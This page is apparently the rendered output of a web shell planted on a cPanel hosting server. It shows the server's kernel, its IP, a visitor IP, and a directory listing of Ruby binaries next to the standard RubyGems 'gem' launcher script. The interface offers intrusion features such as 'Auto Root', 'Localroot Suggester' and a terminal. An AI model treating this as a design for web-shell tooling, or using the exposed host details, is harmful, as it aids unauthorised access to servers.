Linux bear.hostingplus.cl 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
LiteSpeed
Server IP : 192.140.57.17 & Your IP : 216.73.216.106
Domains :
Cant Read [ /etc/named.conf ]
User : explo
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpanel /
ea-ruby27 /
root /
usr /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
bundle
552
B
-rwxr-xr-x
2023-04-05 11:24
bundler
554
B
-rwxr-xr-x
2023-04-05 11:24
erb
4.97
KB
-rwxr-xr-x
2023-04-05 11:24
gem
568
B
-rwxr-xr-x
2023-04-05 11:24
irb
530
B
-rwxr-xr-x
2023-04-05 11:24
passenger
1.79
KB
-rwxr-xr-x
2026-02-05 06:04
passenger-config
1.64
KB
-rwxr-xr-x
2026-02-05 06:04
racc
609
B
-rwxr-xr-x
2023-04-05 11:24
racc2y
613
B
-rwxr-xr-x
2023-04-05 11:24
rackup
85
B
-rwxr-xr-x
2026-02-20 09:27
rdoc
536
B
-rwxr-xr-x
2023-04-05 11:24
ri
532
B
-rwxr-xr-x
2023-04-05 11:24
ruby
7.96
KB
-rwxr-xr-x
2023-04-05 11:24
y2racc
613
B
-rwxr-xr-x
2023-04-05 11:24
Save
Rename
#!/opt/cpanel/ea-ruby27/root/usr/bin/ruby #-- # Copyright 2006 by Chad Fowler, Rich Kilmer, Jim Weirich and others. # All rights reserved. # See LICENSE.txt for permissions. #++ require 'rubygems' require 'rubygems/gem_runner' require 'rubygems/exceptions' required_version = Gem::Requirement.new ">= 1.8.7" unless required_version.satisfied_by? Gem.ruby_version then abort "Expected Ruby Version #{required_version}, is #{Gem.ruby_version}" end args = ARGV.clone begin Gem::GemRunner.new.run args rescue Gem::SystemExitException => e exit e.exit_code end